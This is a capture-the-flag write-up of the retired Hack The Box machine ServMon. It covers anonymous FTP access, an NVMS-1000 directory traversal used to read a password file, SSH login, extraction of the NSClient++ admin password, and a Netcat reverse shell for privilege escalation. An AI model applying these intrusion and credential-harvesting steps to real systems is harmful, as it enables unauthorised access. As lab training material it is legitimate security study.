ServMon is an Easy Windows box created by dmw0ng. It was released on April 11th, 2020 and retired on June 20th, 2020. The users rated the difficulty 4.1/10 and gave an appreciation score of 2.1/5.
TL;DR
We access an FTP server anonymously to retrieve some information about a password file in nathan home directory. A directory traversal/arbitrary file read vulnerability on a NVMS-1000 instance allows us to read this file and get nadine password. We can log in through SSH to retrieve the user flag. Another website exposes an NSClient++ instance. We can read the admin password from its configuration file. We then exploit a known authenticated privilege escalation vulnerability to get the root flag.
Reconnaissance & Enumeration
Open Ports
An NMAP scan shows the following (partial) output:
$ sudo nmap -sS -sV -p- 10.10.10.184
| PORT | STATE | SERVICE | VERSION |
|---|---|---|---|
| 21/tcp | open | ftp | Microsoft ftpd |
| 22/tcp | open | ssh | OpenSSH for_Windows_7.7 (protocol 2.0) |
| 80/tcp | open | http | |
| 135/tcp | open | msrpc | Microsoft Windows RPC |
| 139/tcp | open | netbios-ssn | Microsoft Windows netbios-ssn |
| 445/tcp | open | microsoft-ds? | |
| 5040/tcp | open | unknown | |
| 5666/tcp | open | nrpe? | |
| 6063/tcp | open | x11? | |
| 6699/tcp | open | napster? | |
| 7680/tcp | open | pando-pub? | |
| 8443/tcp | open | tcpwrapped |
We discover:
- a Microsoft FTP server,
- 2 websites on port 80 and 8443,
- the SMB/RPC and other weird Microsoft ports opened.
Web discovery — 80
We access the login page of a network surveillance management software called NVMS-1000:
There is a known Directory Traversal vulnerability on this product. However, we do not know the version(s) impacted.
A Nikto and a folder/file discovery scan do not show much information.
Web discovery — 8443
Here we have access to a NSClient++ web application:
This is a monitoring tool originally created to work with Nagios. The version 0.5.2.35 has a known authenticated privilege escalation vulnerability.
--ignore-certicate-errors flag.
FTP
Anonymous login is enabled and we can access a Users folder that contains the folders Nadine and Nathan. The Confidential.txt file in Nadine folder contains the following message:
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine
And the Notes to do.txt in Nathan folder shows:
- Change the password for NVMS - Complete
- Lock down the NSClient Access - Complete
- Upload the passwords
- Remove public access to NVMS
- Place the secret files in SharePoint
SMB
SMB requires authentication and we don’t have any credentials at this point.## [2] Gaining Access
We know that there may be a Password.txt file in nathan desktop folder. We can try to exploit the directory traversal/arbitrary file read vulnerability to read it. Using the payload of the documented exploit does not work:
With some encoding, however:
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
Next, we get the password file…as we know the path:
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
We can store those passwords and test them with the 2 users we know:
We get nadine password that we can use to log in through SSH and to get the user flag:
Local Reconnaissance & Enumeration
According to the NSClient++ exploit description, there are 2 ways to retrieve the password:
-
from its configuration file:
nadine@SERVMON c:\Program Files\NSClient++>type nsclient.ini
[…]
; Undocumented key
password = ew2x6SsGTxjRwXOT; Undocumented key
allowed hosts = 127.0.0.1
[…] -
by using the client binary
nscp.exe:
nadine@SERVMON c:\Program Files\NSClient++>nscp.exe web --password --display
Current password: ew2x6SsGTxjRwXOT
But when we use it, we are still not allowed. This is probably due to the allowed hosts config that is set to accept only access from 127.0.0.1.
Privilege Escalation
Let’s try through an SSH tunnel which would make us browse it from the localhost:
Then we browse https://localhost:8843…but we can’t reach it. By pinging localhost on the box, we see that it resolves to IPv6 localhost ::1. We retry with:
This time we access the website and we can log in…but the whole page is damn slow:
We can now try to exploit the known privilege escalation vulnerability. The exploit requires to enable 2 modules: CheckExternalScripts and Scheduler. We can check that they are already enabled. Then we can follow these steps:
- copy Netcat on the server and start a listener locally:
$ nc -lnvp 1234
- modify the settings of the
CheckExternalScriptsmodule to run a Netcat reverse shell:
- reload the module and wait for it:
Click once to unload it and once more to re-load it and trigger the reverse shell:
Conclusion
An easy box exploiting some basic public vulnerabilities. The only difficulty was the stability of the box when many users were trying to exploit it all at once. I think the bad score of this box was mainly due to that.
As usual, here are some takeaways:
- update your software, run them with dedicated service accounts and don’t expose them publicly if this is not needed,
- disable anonymous FTP login, even better…stop using FTP once and for all! Switch to FTPS, SFTP, or possibly to a solution with 2FA.
Resources
[1] NVMS-1000 Network Surveillance Management Software
http://en.tvt.net.cn/products/188.html
[2] NVMS-1000 Directory Traversal
https://www.exploit-db.com/exploits/47774
[3] NSClient++
https://nsclient.org/
[4] NSClient++ authenticated privilege escalation vulnerability
https://www.exploit-db.com/exploits/46802
